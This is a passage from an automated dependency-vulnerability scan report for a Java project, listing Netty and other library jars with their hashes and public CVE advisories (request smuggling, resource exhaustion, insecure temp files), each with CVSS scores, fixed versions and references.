Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporary storing of uploads on the disk is enabled. On Unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on Unix-like systems creates a random file, but by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM, or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
netty-transport-native-kqueue-4.1.48.Final-osx-x86_64.jar
Description: Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients.
License: http://www.apache.org/licenses/LICENSE-2.0
File Path: /var/simplicite/.m2/repository/io/netty/netty-transport-native-kqueue/4.1.48.Final/netty-transport-native-kqueue-4.1.48.Final-osx-x86_64.jar
MD5: 54f481effe90ff48eef20a5d0e6043f0
SHA1: 6c904f9dadbd4fa242697339a512e2c4b66f4b8c
SHA256: 8b992851ef9991b56493ab76d5c98d6958ea3045832c04dc8e2d1ca3c62f763c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | netty-transport-native-kqueue | High |
| Vendor | jar | package name | io | Highest |
| Vendor | jar | package name | kqueue | Highest |
| Vendor | jar | package name | netty | Highest |
| Vendor | Manifest | automatic-module-name | io.netty.transport.kqueue | Medium |
| Vendor | Manifest | bundle-docurl | https://netty.io/ | Low |
| Vendor | Manifest | bundle-nativecode | META-INF/native/libnetty_transport_native_kqueue_x86_64.jnilib; osname=MacOSX, processor=x86_64" | Low |
| Vendor | Manifest | bundle-symbolicname | io.netty.transport-native-kqueue | Medium |
| Vendor | Manifest | implementation-url | https://netty.io/netty-transport-native-kqueue/ | Low |
| Vendor | Manifest | Implementation-Vendor | The Netty Project | High |
| Vendor | Manifest | Implementation-Vendor-Id | io.netty | Medium |
| Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low |
| Vendor | pom | artifactid | netty-transport-native-kqueue | Highest |
| Vendor | pom | artifactid | netty-transport-native-kqueue | Low |
| Vendor | pom | groupid | io.netty | Highest |
| Vendor | pom | name | Netty/Transport/Native/KQueue | High |
| Vendor | pom | parent-artifactid | netty-parent | Low |
| Product | file | name | netty-transport-native-kqueue | High |
| Product | jar | package name | io | Highest |
| Product | jar | package name | kqueue | Highest |
| Product | jar | package name | netty | Highest |
| Product | Manifest | automatic-module-name | io.netty.transport.kqueue | Medium |
| Product | Manifest | bundle-docurl | https://netty.io/ | Low |
| Product | Manifest | Bundle-Name | Netty/Transport/Native/KQueue | Medium |
| Product | Manifest | bundle-nativecode | META-INF/native/libnetty_transport_native_kqueue_x86_64.jnilib; osname=MacOSX, processor=x86_64" | Low |
| Product | Manifest | bundle-symbolicname | io.netty.transport-native-kqueue | Medium |
| Product | Manifest | Implementation-Title | Netty/Transport/Native/KQueue | High |
| Product | Manifest | implementation-url | https://netty.io/netty-transport-native-kqueue/ | Low |
| Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low |
| Product | pom | artifactid | netty-transport-native-kqueue | Highest |
| Product | pom | groupid | io.netty | Highest |
| Product | pom | name | Netty/Transport/Native/KQueue | High |
| Product | pom | parent-artifactid | netty-parent | Medium |
| Version | Manifest | Bundle-Version | 4.1.48.Final | High |
| Version | Manifest | Implementation-Version | 4.1.48.Final | High |
| Version | pom | version | 4.1.48.Final | Highest |

Related Dependencies
netty-transport-native-epoll-4.1.48.Final-linux-x86_64.jar
File Path: /var/simplicite/.m2/repository/io/netty/netty-transport-native-epoll/4.1.48.Final/netty-transport-native-epoll-4.1.48.Final-linux-x86_64.jar
MD5: 5a1668504ac698fffa39c562ab932e8b
SHA1: 2b25233dda8b986297076a7d62552c1ec2f41ed8
SHA256: 7436ecfb442b299af6ecff7ae6a8d3f00fb56e081d20e82b467dad2e6ee8848f
pkg:maven/io.netty/netty-transport-native-epoll@4.1.48.Final
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length, which may lead to excessive memory usage. Besides this, it may also buffer reserved skippable chunks until the whole chunk has been received, which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-41881
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast, as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forwards these to another remote system when used as a proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the server name indicated by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet, but there are no checks done here and, the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and is then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final
- [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48)
- [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022
- [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final
- [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290
- [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290
- [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0
- [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295
- [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E
- CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
- CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/
- DEBIAN - DSA-4885
- MISC - https://github.com/Netflix/zuul/pull/980
- MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4
- MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
Vulnerable Software & Versions:
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a follow-up of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, whose fix missed this one case. This was fixed as part of 4.1.61.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on disk is enabled. On Unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS operating systems. The method "File.createTempFile" on Unix-like systems creates a random file, but by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows, as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
oauth-2.2.0.jar
Description: jclouds components to access OAuth
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/oauth/2.2.0/oauth-2.2.0.jar
MD5: 8808e0e07ab9a59b59145e41cde732bd
SHA1: 693ec29e9dc563386dae46368b6da9d1f44ab048
SHA256: 75cb471ad1cc56dcca39bee1c488a2a7f571f8466c9e21d2e565891c6b736e69
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name oauth High Vendor jar package name jclouds Highest Vendor jar package name oauth Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname oauth Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid oauth Highest Vendor pom artifactid oauth Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds OAuth core High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name oauth High Product jar package name jclouds Highest Product jar package name oauth Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds OAuth core Medium Product Manifest bundle-symbolicname oauth Medium Product Manifest Implementation-Title jclouds OAuth core High Product Manifest specification-title jclouds jclouds OAuth core Medium Product pom artifactid oauth Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds OAuth core High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
ojdbc8-23.3.0.23.09.jar
Description: Oracle JDBC Driver compatible with JDK8, JDK11, JDK12, JDK13, JDK14 and JDK15
